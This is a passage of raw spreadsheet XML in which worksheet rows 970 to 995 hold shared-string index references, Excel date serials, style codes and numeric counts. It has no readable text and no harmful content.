    <row r="970" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A970" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B970" s="52">
        <v>44294.653877118057</v>
      </c>
      <c r="C970" s="95" t="s">
        <v>3031</v>
      </c>
      <c r="D970" s="96">
        <v>112</v>
      </c>
      <c r="E970" s="95" t="s">
        <v>3039</v>
      </c>
      <c r="F970" s="42">
        <v>102</v>
      </c>
      <c r="G970" s="95" t="s">
        <v>3040</v>
      </c>
      <c r="H970" t="s">
        <v>3041</v>
      </c>
      <c r="I970" t="s">
        <v>268</v>
      </c>
      <c r="J970" s="95" t="s">
        <v>269</v>
      </c>
      <c r="K970" s="95" t="s">
        <v>10</v>
      </c>
      <c r="L970" t="s">
        <v>77</v>
      </c>
      <c r="M970" s="95" t="s">
        <v>270</v>
      </c>
      <c r="N970" t="s">
        <v>271</v>
      </c>
      <c r="Q970" s="95" t="s">
        <v>3035</v>
      </c>
      <c r="W970" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="971" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A971" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B971" s="52">
        <v>44342.385217916664</v>
      </c>
      <c r="C971" s="95" t="s">
        <v>3042</v>
      </c>
      <c r="D971" s="96">
        <v>205</v>
      </c>
      <c r="E971" s="95" t="s">
        <v>3043</v>
      </c>
      <c r="F971" s="42">
        <v>204</v>
      </c>
      <c r="G971" s="95" t="s">
        <v>3044</v>
      </c>
      <c r="H971" t="s">
        <v>3045</v>
      </c>
      <c r="I971" t="s">
        <v>611</v>
      </c>
      <c r="J971" s="95" t="s">
        <v>612</v>
      </c>
      <c r="K971" s="95" t="s">
        <v>14</v>
      </c>
      <c r="L971" t="s">
        <v>77</v>
      </c>
      <c r="M971" s="95" t="s">
        <v>612</v>
      </c>
      <c r="N971" t="s">
        <v>1098</v>
      </c>
      <c r="O971" s="95" t="s">
        <v>1377</v>
      </c>
      <c r="P971" t="s">
        <v>612</v>
      </c>
      <c r="Q971" s="95" t="s">
        <v>3046</v>
      </c>
      <c r="R971">
        <v>319853</v>
      </c>
      <c r="S971">
        <v>1060325</v>
      </c>
      <c r="T971">
        <v>690881</v>
      </c>
      <c r="U971">
        <v>1431176</v>
      </c>
      <c r="V971">
        <v>1574453</v>
      </c>
      <c r="W971" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="972" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A972" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B972" s="52">
        <v>44342.385217916664</v>
      </c>
      <c r="C972" s="95" t="s">
        <v>3042</v>
      </c>
      <c r="D972" s="96">
        <v>300</v>
      </c>
      <c r="E972" s="95" t="s">
        <v>3043</v>
      </c>
      <c r="F972" s="42">
        <v>300</v>
      </c>
      <c r="G972" s="95" t="s">
        <v>3044</v>
      </c>
      <c r="H972" t="s">
        <v>3045</v>
      </c>
      <c r="I972" t="s">
        <v>611</v>
      </c>
      <c r="J972" s="95" t="s">
        <v>612</v>
      </c>
      <c r="K972" s="95" t="s">
        <v>14</v>
      </c>
      <c r="L972" t="s">
        <v>77</v>
      </c>
      <c r="M972" s="95" t="s">
        <v>612</v>
      </c>
      <c r="N972" t="s">
        <v>1098</v>
      </c>
      <c r="O972" s="95" t="s">
        <v>1377</v>
      </c>
      <c r="P972" t="s">
        <v>612</v>
      </c>
      <c r="Q972" s="95" t="s">
        <v>3047</v>
      </c>
      <c r="R972">
        <v>319853</v>
      </c>
      <c r="S972">
        <v>1060325</v>
      </c>
      <c r="T972">
        <v>690881</v>
      </c>
      <c r="U972">
        <v>1431176</v>
      </c>
      <c r="V972">
        <v>1574453</v>
      </c>
      <c r="W972" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="973" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A973" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B973" s="52">
        <v>44494.699802650466</v>
      </c>
      <c r="C973" s="95" t="s">
        <v>3048</v>
      </c>
      <c r="D973" s="96">
        <v>100</v>
      </c>
      <c r="E973" s="95" t="s">
        <v>3049</v>
      </c>
      <c r="F973" s="42">
        <v>100</v>
      </c>
      <c r="G973" s="95" t="s">
        <v>3050</v>
      </c>
      <c r="H973" t="s">
        <v>1360</v>
      </c>
      <c r="I973" t="s">
        <v>268</v>
      </c>
      <c r="J973" s="95" t="s">
        <v>269</v>
      </c>
      <c r="K973" s="95" t="s">
        <v>10</v>
      </c>
      <c r="L973" t="s">
        <v>77</v>
      </c>
      <c r="M973" s="95" t="s">
        <v>290</v>
      </c>
      <c r="N973" t="s">
        <v>291</v>
      </c>
      <c r="Q973" s="95" t="s">
        <v>3051</v>
      </c>
      <c r="T973">
        <v>2</v>
      </c>
      <c r="U973">
        <v>753</v>
      </c>
      <c r="V973">
        <v>2127812</v>
      </c>
      <c r="W973" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="974" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A974" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B974" s="52">
        <v>44714.470675266202</v>
      </c>
      <c r="C974" s="95" t="s">
        <v>3048</v>
      </c>
      <c r="D974" s="96">
        <v>100</v>
      </c>
      <c r="E974" s="95" t="s">
        <v>3049</v>
      </c>
      <c r="F974" s="42">
        <v>100</v>
      </c>
      <c r="G974" s="95" t="s">
        <v>3050</v>
      </c>
      <c r="H974" t="s">
        <v>1360</v>
      </c>
      <c r="I974" t="s">
        <v>268</v>
      </c>
      <c r="J974" s="95" t="s">
        <v>269</v>
      </c>
      <c r="K974" s="95" t="s">
        <v>10</v>
      </c>
      <c r="L974" t="s">
        <v>77</v>
      </c>
      <c r="M974" s="95" t="s">
        <v>290</v>
      </c>
      <c r="N974" t="s">
        <v>291</v>
      </c>
      <c r="Q974" s="95" t="s">
        <v>1413</v>
      </c>
      <c r="T974">
        <v>2</v>
      </c>
      <c r="U974">
        <v>753</v>
      </c>
      <c r="V974">
        <v>2127812</v>
      </c>
      <c r="W974" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="975" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A975" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B975" s="52">
        <v>44079.513581053237</v>
      </c>
      <c r="C975" s="95" t="s">
        <v>3052</v>
      </c>
      <c r="D975" s="96">
        <v>110</v>
      </c>
      <c r="E975" s="95" t="s">
        <v>3053</v>
      </c>
      <c r="F975" s="42">
        <v>110</v>
      </c>
      <c r="G975" s="95" t="s">
        <v>3054</v>
      </c>
      <c r="H975" t="s">
        <v>3045</v>
      </c>
      <c r="I975" t="s">
        <v>611</v>
      </c>
      <c r="J975" s="95" t="s">
        <v>612</v>
      </c>
      <c r="K975" s="95" t="s">
        <v>14</v>
      </c>
      <c r="L975" t="s">
        <v>77</v>
      </c>
      <c r="M975" s="95" t="s">
        <v>612</v>
      </c>
      <c r="N975" t="s">
        <v>1098</v>
      </c>
      <c r="O975" s="95" t="s">
        <v>1356</v>
      </c>
      <c r="Q975" s="95" t="s">
        <v>3055</v>
      </c>
      <c r="T975">
        <v>63</v>
      </c>
      <c r="U975">
        <v>309</v>
      </c>
      <c r="V975">
        <v>352</v>
      </c>
      <c r="W975" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="976" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A976" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B976" s="52">
        <v>44079.513581053237</v>
      </c>
      <c r="C976" s="95" t="s">
        <v>3052</v>
      </c>
      <c r="D976" s="96">
        <v>200</v>
      </c>
      <c r="E976" s="95" t="s">
        <v>3053</v>
      </c>
      <c r="F976" s="42">
        <v>200</v>
      </c>
      <c r="G976" s="95" t="s">
        <v>3054</v>
      </c>
      <c r="H976" t="s">
        <v>3045</v>
      </c>
      <c r="I976" t="s">
        <v>611</v>
      </c>
      <c r="J976" s="95" t="s">
        <v>612</v>
      </c>
      <c r="K976" s="95" t="s">
        <v>14</v>
      </c>
      <c r="L976" t="s">
        <v>77</v>
      </c>
      <c r="M976" s="95" t="s">
        <v>612</v>
      </c>
      <c r="N976" t="s">
        <v>1098</v>
      </c>
      <c r="O976" s="95" t="s">
        <v>1356</v>
      </c>
      <c r="Q976" s="95" t="s">
        <v>3056</v>
      </c>
      <c r="T976">
        <v>63</v>
      </c>
      <c r="U976">
        <v>309</v>
      </c>
      <c r="V976">
        <v>352</v>
      </c>
      <c r="W976" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="977" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A977" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B977" s="52"/>
      <c r="C977" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D977" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E977" s="95" t="s">
        <v>3057</v>
      </c>
      <c r="F977" s="42">
        <v>100</v>
      </c>
      <c r="G977" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H977" t="s">
        <v>3058</v>
      </c>
      <c r="I977" t="s">
        <v>172</v>
      </c>
      <c r="J977" s="95" t="s">
        <v>173</v>
      </c>
      <c r="K977" s="95" t="s">
        <v>13</v>
      </c>
      <c r="L977" t="s">
        <v>83</v>
      </c>
      <c r="M977" s="95" t="s">
        <v>72</v>
      </c>
      <c r="N977" t="s">
        <v>522</v>
      </c>
      <c r="Q977" s="95" t="s">
        <v>1821</v>
      </c>
      <c r="W977" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="978" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A978" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B978" s="52"/>
      <c r="C978" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D978" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E978" s="95" t="s">
        <v>3059</v>
      </c>
      <c r="F978" s="42">
        <v>100</v>
      </c>
      <c r="G978" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H978" t="s">
        <v>3060</v>
      </c>
      <c r="I978" t="s">
        <v>156</v>
      </c>
      <c r="J978" s="95" t="s">
        <v>301</v>
      </c>
      <c r="K978" s="95" t="s">
        <v>26</v>
      </c>
      <c r="L978" t="s">
        <v>77</v>
      </c>
      <c r="M978" s="95" t="s">
        <v>301</v>
      </c>
      <c r="N978" t="s">
        <v>476</v>
      </c>
      <c r="P978" t="s">
        <v>2059</v>
      </c>
      <c r="Q978" s="95" t="s">
        <v>3061</v>
      </c>
      <c r="W978" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="979" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A979" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B979" s="52"/>
      <c r="C979" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D979" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E979" s="95" t="s">
        <v>3062</v>
      </c>
      <c r="F979" s="42">
        <v>100</v>
      </c>
      <c r="G979" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H979" t="s">
        <v>3063</v>
      </c>
      <c r="I979" t="s">
        <v>75</v>
      </c>
      <c r="J979" s="95" t="s">
        <v>236</v>
      </c>
      <c r="K979" s="95" t="s">
        <v>29</v>
      </c>
      <c r="L979" t="s">
        <v>83</v>
      </c>
      <c r="M979" s="95" t="s">
        <v>72</v>
      </c>
      <c r="Q979" s="95" t="s">
        <v>3064</v>
      </c>
      <c r="W979" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="980" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A980" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B980" s="52">
        <v>44420.714931215276</v>
      </c>
      <c r="C980" s="95" t="s">
        <v>3065</v>
      </c>
      <c r="D980" s="96">
        <v>102</v>
      </c>
      <c r="E980" s="95" t="s">
        <v>3066</v>
      </c>
      <c r="F980" s="42">
        <v>102</v>
      </c>
      <c r="G980" s="95" t="s">
        <v>3067</v>
      </c>
      <c r="H980" t="s">
        <v>3068</v>
      </c>
      <c r="I980" t="s">
        <v>82</v>
      </c>
      <c r="J980" s="95" t="s">
        <v>43</v>
      </c>
      <c r="K980" s="95" t="s">
        <v>24</v>
      </c>
      <c r="L980" t="s">
        <v>83</v>
      </c>
      <c r="M980" s="95" t="s">
        <v>72</v>
      </c>
      <c r="O980" s="95" t="s">
        <v>111</v>
      </c>
      <c r="Q980" s="95" t="s">
        <v>2283</v>
      </c>
      <c r="R980">
        <v>2558</v>
      </c>
      <c r="S980">
        <v>2634</v>
      </c>
      <c r="T980">
        <v>1930</v>
      </c>
      <c r="U980">
        <v>2011</v>
      </c>
      <c r="V980">
        <v>2027</v>
      </c>
      <c r="W980" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="981" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A981" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B981" s="52">
        <v>44082.361591076391</v>
      </c>
      <c r="C981" s="95" t="s">
        <v>2378</v>
      </c>
      <c r="D981" s="96">
        <v>100</v>
      </c>
      <c r="E981" s="95" t="s">
        <v>3069</v>
      </c>
      <c r="F981" s="42">
        <v>100</v>
      </c>
      <c r="G981" s="95" t="s">
        <v>2380</v>
      </c>
      <c r="H981" t="s">
        <v>3070</v>
      </c>
      <c r="I981" t="s">
        <v>31</v>
      </c>
      <c r="J981" s="95" t="s">
        <v>262</v>
      </c>
      <c r="K981" s="95" t="s">
        <v>31</v>
      </c>
      <c r="L981" t="s">
        <v>77</v>
      </c>
      <c r="M981" s="95" t="s">
        <v>262</v>
      </c>
      <c r="N981" t="s">
        <v>263</v>
      </c>
      <c r="Q981" s="95" t="s">
        <v>1421</v>
      </c>
      <c r="R981">
        <v>39841</v>
      </c>
      <c r="S981">
        <v>20880</v>
      </c>
      <c r="T981">
        <v>342</v>
      </c>
      <c r="U981">
        <v>594</v>
      </c>
      <c r="V981">
        <v>645</v>
      </c>
      <c r="W981" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="982" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A982" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B982" s="52"/>
      <c r="C982" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D982" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E982" s="95" t="s">
        <v>3071</v>
      </c>
      <c r="F982" s="42">
        <v>100</v>
      </c>
      <c r="G982" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H982" t="s">
        <v>3072</v>
      </c>
      <c r="I982" t="s">
        <v>172</v>
      </c>
      <c r="J982" s="95" t="s">
        <v>173</v>
      </c>
      <c r="K982" s="95" t="s">
        <v>13</v>
      </c>
      <c r="L982" t="s">
        <v>83</v>
      </c>
      <c r="M982" s="95" t="s">
        <v>72</v>
      </c>
      <c r="N982" t="s">
        <v>3073</v>
      </c>
      <c r="Q982" s="95" t="s">
        <v>3074</v>
      </c>
      <c r="W982" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="983" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A983" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B983" s="52">
        <v>44119.703438611112</v>
      </c>
      <c r="C983" s="95" t="s">
        <v>3075</v>
      </c>
      <c r="D983" s="96">
        <v>101</v>
      </c>
      <c r="E983" s="95" t="s">
        <v>3076</v>
      </c>
      <c r="F983" s="42">
        <v>101</v>
      </c>
      <c r="G983" s="95" t="s">
        <v>3077</v>
      </c>
      <c r="H983" t="s">
        <v>3078</v>
      </c>
      <c r="I983" t="s">
        <v>156</v>
      </c>
      <c r="J983" s="95" t="s">
        <v>226</v>
      </c>
      <c r="K983" s="95" t="s">
        <v>27</v>
      </c>
      <c r="L983" t="s">
        <v>77</v>
      </c>
      <c r="M983" s="95" t="s">
        <v>308</v>
      </c>
      <c r="N983" t="s">
        <v>309</v>
      </c>
      <c r="O983" s="95" t="s">
        <v>3079</v>
      </c>
      <c r="Q983" s="95" t="s">
        <v>3080</v>
      </c>
      <c r="S983">
        <v>2</v>
      </c>
      <c r="T983">
        <v>1</v>
      </c>
      <c r="W983" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="984" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A984" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B984" s="52">
        <v>44063.692973888887</v>
      </c>
      <c r="C984" s="95" t="s">
        <v>3081</v>
      </c>
      <c r="D984" s="96">
        <v>100</v>
      </c>
      <c r="E984" s="95" t="s">
        <v>3082</v>
      </c>
      <c r="F984" s="42">
        <v>100</v>
      </c>
      <c r="G984" s="95" t="s">
        <v>3083</v>
      </c>
      <c r="H984" t="s">
        <v>3084</v>
      </c>
      <c r="I984" t="s">
        <v>185</v>
      </c>
      <c r="J984" s="95" t="s">
        <v>186</v>
      </c>
      <c r="K984" s="95" t="s">
        <v>16</v>
      </c>
      <c r="L984" t="s">
        <v>83</v>
      </c>
      <c r="M984" s="95" t="s">
        <v>72</v>
      </c>
      <c r="O984" s="95" t="s">
        <v>2176</v>
      </c>
      <c r="Q984" s="95" t="s">
        <v>3085</v>
      </c>
      <c r="R984">
        <v>103245</v>
      </c>
      <c r="S984">
        <v>90069</v>
      </c>
      <c r="T984">
        <v>84307</v>
      </c>
      <c r="U984">
        <v>94873</v>
      </c>
      <c r="V984">
        <v>120539</v>
      </c>
      <c r="W984" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="985" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A985" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B985" s="52"/>
      <c r="C985" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D985" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E985" s="95" t="s">
        <v>3086</v>
      </c>
      <c r="F985" s="42">
        <v>100</v>
      </c>
      <c r="G985" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H985" t="s">
        <v>3087</v>
      </c>
      <c r="I985" t="s">
        <v>268</v>
      </c>
      <c r="J985" s="95" t="s">
        <v>1572</v>
      </c>
      <c r="K985" s="95" t="s">
        <v>35</v>
      </c>
      <c r="L985" t="s">
        <v>83</v>
      </c>
      <c r="M985" s="95" t="s">
        <v>148</v>
      </c>
      <c r="N985" t="s">
        <v>149</v>
      </c>
      <c r="P985" t="s">
        <v>3088</v>
      </c>
      <c r="Q985" s="95" t="s">
        <v>3089</v>
      </c>
      <c r="W985" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="986" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A986" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B986" s="52">
        <v>44603.453514780093</v>
      </c>
      <c r="C986" s="95" t="s">
        <v>3090</v>
      </c>
      <c r="D986" s="96">
        <v>130</v>
      </c>
      <c r="E986" s="95" t="s">
        <v>3091</v>
      </c>
      <c r="F986" s="42">
        <v>104</v>
      </c>
      <c r="G986" s="95" t="s">
        <v>2376</v>
      </c>
      <c r="H986" t="s">
        <v>3092</v>
      </c>
      <c r="I986" t="s">
        <v>31</v>
      </c>
      <c r="J986" s="95" t="s">
        <v>262</v>
      </c>
      <c r="K986" s="95" t="s">
        <v>31</v>
      </c>
      <c r="L986" t="s">
        <v>77</v>
      </c>
      <c r="M986" s="95" t="s">
        <v>262</v>
      </c>
      <c r="N986" t="s">
        <v>263</v>
      </c>
      <c r="Q986" s="95" t="s">
        <v>3093</v>
      </c>
      <c r="R986">
        <v>175315</v>
      </c>
      <c r="S986">
        <v>264901</v>
      </c>
      <c r="T986">
        <v>292700</v>
      </c>
      <c r="U986">
        <v>308208</v>
      </c>
      <c r="V986">
        <v>396773</v>
      </c>
      <c r="W986" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="987" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A987" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B987" s="52">
        <v>44648.575936493056</v>
      </c>
      <c r="C987" s="95" t="s">
        <v>3090</v>
      </c>
      <c r="D987" s="96">
        <v>130</v>
      </c>
      <c r="E987" s="95" t="s">
        <v>3094</v>
      </c>
      <c r="F987" s="42">
        <v>120</v>
      </c>
      <c r="G987" s="95" t="s">
        <v>3095</v>
      </c>
      <c r="H987" t="s">
        <v>3096</v>
      </c>
      <c r="I987" t="s">
        <v>31</v>
      </c>
      <c r="J987" s="95" t="s">
        <v>262</v>
      </c>
      <c r="K987" s="95" t="s">
        <v>31</v>
      </c>
      <c r="L987" t="s">
        <v>77</v>
      </c>
      <c r="M987" s="95" t="s">
        <v>262</v>
      </c>
      <c r="N987" t="s">
        <v>263</v>
      </c>
      <c r="Q987" s="95" t="s">
        <v>3093</v>
      </c>
      <c r="S987">
        <v>4</v>
      </c>
      <c r="W987" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="988" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A988" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B988" s="52">
        <v>44005.645293530091</v>
      </c>
      <c r="C988" s="95" t="s">
        <v>3097</v>
      </c>
      <c r="D988" s="96">
        <v>160</v>
      </c>
      <c r="E988" s="95" t="s">
        <v>3098</v>
      </c>
      <c r="F988" s="42">
        <v>120</v>
      </c>
      <c r="G988" s="95" t="s">
        <v>3099</v>
      </c>
      <c r="H988" t="s">
        <v>3100</v>
      </c>
      <c r="I988" t="s">
        <v>203</v>
      </c>
      <c r="J988" s="95" t="s">
        <v>3101</v>
      </c>
      <c r="K988" s="95" t="s">
        <v>16</v>
      </c>
      <c r="L988" t="s">
        <v>83</v>
      </c>
      <c r="M988" s="95" t="s">
        <v>72</v>
      </c>
      <c r="Q988" s="95" t="s">
        <v>3102</v>
      </c>
      <c r="W988" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="989" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A989" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B989" s="52">
        <v>44155.753830081019</v>
      </c>
      <c r="C989" s="95" t="s">
        <v>3103</v>
      </c>
      <c r="D989" s="96">
        <v>102</v>
      </c>
      <c r="E989" s="95" t="s">
        <v>3104</v>
      </c>
      <c r="F989" s="42">
        <v>102</v>
      </c>
      <c r="G989" s="95" t="s">
        <v>3105</v>
      </c>
      <c r="H989" t="s">
        <v>3106</v>
      </c>
      <c r="I989" t="s">
        <v>75</v>
      </c>
      <c r="J989" s="95" t="s">
        <v>76</v>
      </c>
      <c r="K989" s="95" t="s">
        <v>21</v>
      </c>
      <c r="L989" t="s">
        <v>77</v>
      </c>
      <c r="M989" s="95" t="s">
        <v>2703</v>
      </c>
      <c r="Q989" s="95" t="s">
        <v>3107</v>
      </c>
      <c r="R989">
        <v>102826</v>
      </c>
      <c r="S989">
        <v>76379</v>
      </c>
      <c r="T989">
        <v>508791</v>
      </c>
      <c r="U989">
        <v>778265</v>
      </c>
      <c r="V989">
        <v>910223</v>
      </c>
      <c r="W989" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="990" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A990" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B990" s="52">
        <v>43746.727824120368</v>
      </c>
      <c r="C990" s="95" t="s">
        <v>3108</v>
      </c>
      <c r="D990" s="96">
        <v>121</v>
      </c>
      <c r="E990" s="95" t="s">
        <v>3109</v>
      </c>
      <c r="F990" s="42">
        <v>100</v>
      </c>
      <c r="G990" s="95" t="s">
        <v>3110</v>
      </c>
      <c r="H990" t="s">
        <v>3111</v>
      </c>
      <c r="I990" t="s">
        <v>611</v>
      </c>
      <c r="J990" s="95" t="s">
        <v>612</v>
      </c>
      <c r="K990" s="95" t="s">
        <v>14</v>
      </c>
      <c r="L990" t="s">
        <v>77</v>
      </c>
      <c r="M990" s="95" t="s">
        <v>612</v>
      </c>
      <c r="N990" t="s">
        <v>613</v>
      </c>
      <c r="O990" s="95" t="s">
        <v>2122</v>
      </c>
      <c r="P990" t="s">
        <v>612</v>
      </c>
      <c r="Q990" s="95" t="s">
        <v>3112</v>
      </c>
      <c r="R990">
        <v>54</v>
      </c>
      <c r="S990">
        <v>8</v>
      </c>
      <c r="T990">
        <v>296</v>
      </c>
      <c r="U990">
        <v>5470</v>
      </c>
      <c r="V990">
        <v>8549</v>
      </c>
      <c r="W990" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="991" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A991" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B991" s="52">
        <v>44021.135121504631</v>
      </c>
      <c r="C991" s="95" t="s">
        <v>3108</v>
      </c>
      <c r="D991" s="96">
        <v>121</v>
      </c>
      <c r="E991" s="95" t="s">
        <v>3113</v>
      </c>
      <c r="F991" s="42">
        <v>104</v>
      </c>
      <c r="G991" s="95" t="s">
        <v>3114</v>
      </c>
      <c r="H991" t="s">
        <v>3115</v>
      </c>
      <c r="I991" t="s">
        <v>75</v>
      </c>
      <c r="J991" s="95" t="s">
        <v>236</v>
      </c>
      <c r="K991" s="95" t="s">
        <v>21</v>
      </c>
      <c r="L991" t="s">
        <v>77</v>
      </c>
      <c r="M991" s="95" t="s">
        <v>236</v>
      </c>
      <c r="O991" s="95" t="s">
        <v>3116</v>
      </c>
      <c r="P991" t="s">
        <v>909</v>
      </c>
      <c r="Q991" s="95" t="s">
        <v>3112</v>
      </c>
      <c r="R991">
        <v>193196</v>
      </c>
      <c r="S991">
        <v>135705</v>
      </c>
      <c r="T991">
        <v>875656</v>
      </c>
      <c r="U991">
        <v>1629054</v>
      </c>
      <c r="V991">
        <v>1694366</v>
      </c>
      <c r="W991" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="992" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A992" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B992" s="52">
        <v>43777.616899745371</v>
      </c>
      <c r="C992" s="95" t="s">
        <v>3117</v>
      </c>
      <c r="D992" s="96">
        <v>100</v>
      </c>
      <c r="E992" s="95" t="s">
        <v>3118</v>
      </c>
      <c r="F992" s="42">
        <v>100</v>
      </c>
      <c r="G992" s="95" t="s">
        <v>3119</v>
      </c>
      <c r="H992" t="s">
        <v>3120</v>
      </c>
      <c r="I992" t="s">
        <v>611</v>
      </c>
      <c r="J992" s="95" t="s">
        <v>612</v>
      </c>
      <c r="K992" s="95" t="s">
        <v>14</v>
      </c>
      <c r="L992" t="s">
        <v>77</v>
      </c>
      <c r="M992" s="95" t="s">
        <v>612</v>
      </c>
      <c r="N992" t="s">
        <v>613</v>
      </c>
      <c r="O992" s="95" t="s">
        <v>3121</v>
      </c>
      <c r="P992" t="s">
        <v>612</v>
      </c>
      <c r="Q992" s="95" t="s">
        <v>3122</v>
      </c>
      <c r="R992">
        <v>5057</v>
      </c>
      <c r="S992">
        <v>6090</v>
      </c>
      <c r="T992">
        <v>50755</v>
      </c>
      <c r="U992">
        <v>102055</v>
      </c>
      <c r="V992">
        <v>135621</v>
      </c>
      <c r="W992" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="993" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A993" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B993" s="52">
        <v>43746.727824131944</v>
      </c>
      <c r="C993" s="95" t="s">
        <v>3108</v>
      </c>
      <c r="D993" s="96">
        <v>121</v>
      </c>
      <c r="E993" s="95" t="s">
        <v>3123</v>
      </c>
      <c r="F993" s="42">
        <v>100</v>
      </c>
      <c r="G993" s="95" t="s">
        <v>3124</v>
      </c>
      <c r="H993" t="s">
        <v>3125</v>
      </c>
      <c r="I993" t="s">
        <v>611</v>
      </c>
      <c r="J993" s="95" t="s">
        <v>612</v>
      </c>
      <c r="K993" s="95" t="s">
        <v>14</v>
      </c>
      <c r="L993" t="s">
        <v>77</v>
      </c>
      <c r="M993" s="95" t="s">
        <v>612</v>
      </c>
      <c r="N993" t="s">
        <v>613</v>
      </c>
      <c r="O993" s="95" t="s">
        <v>1347</v>
      </c>
      <c r="P993" t="s">
        <v>612</v>
      </c>
      <c r="Q993" s="95" t="s">
        <v>3112</v>
      </c>
      <c r="R993">
        <v>136592</v>
      </c>
      <c r="S993">
        <v>100404</v>
      </c>
      <c r="T993">
        <v>586994</v>
      </c>
      <c r="U993">
        <v>906170</v>
      </c>
      <c r="V993">
        <v>899335</v>
      </c>
      <c r="W993" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="994" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A994" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B994" s="52">
        <v>44203.677725046298</v>
      </c>
      <c r="C994" s="95" t="s">
        <v>3126</v>
      </c>
      <c r="D994" s="96">
        <v>101</v>
      </c>
      <c r="E994" s="95" t="s">
        <v>3127</v>
      </c>
      <c r="F994" s="42">
        <v>101</v>
      </c>
      <c r="G994" s="95" t="s">
        <v>3128</v>
      </c>
      <c r="H994" t="s">
        <v>3129</v>
      </c>
      <c r="I994" t="s">
        <v>611</v>
      </c>
      <c r="J994" s="95" t="s">
        <v>3130</v>
      </c>
      <c r="K994" s="95" t="s">
        <v>14</v>
      </c>
      <c r="L994" t="s">
        <v>77</v>
      </c>
      <c r="M994" s="95" t="s">
        <v>612</v>
      </c>
      <c r="N994" t="s">
        <v>613</v>
      </c>
      <c r="O994" s="95" t="s">
        <v>1336</v>
      </c>
      <c r="Q994" s="95" t="s">
        <v>3131</v>
      </c>
      <c r="R994">
        <v>5780</v>
      </c>
      <c r="S994">
        <v>4793</v>
      </c>
      <c r="T994">
        <v>33617</v>
      </c>
      <c r="U994">
        <v>47380</v>
      </c>
      <c r="V994">
        <v>39280</v>
      </c>
      <c r="W994" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="995" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A995" s="95" t="s">
        <v>3</v>
      </c>
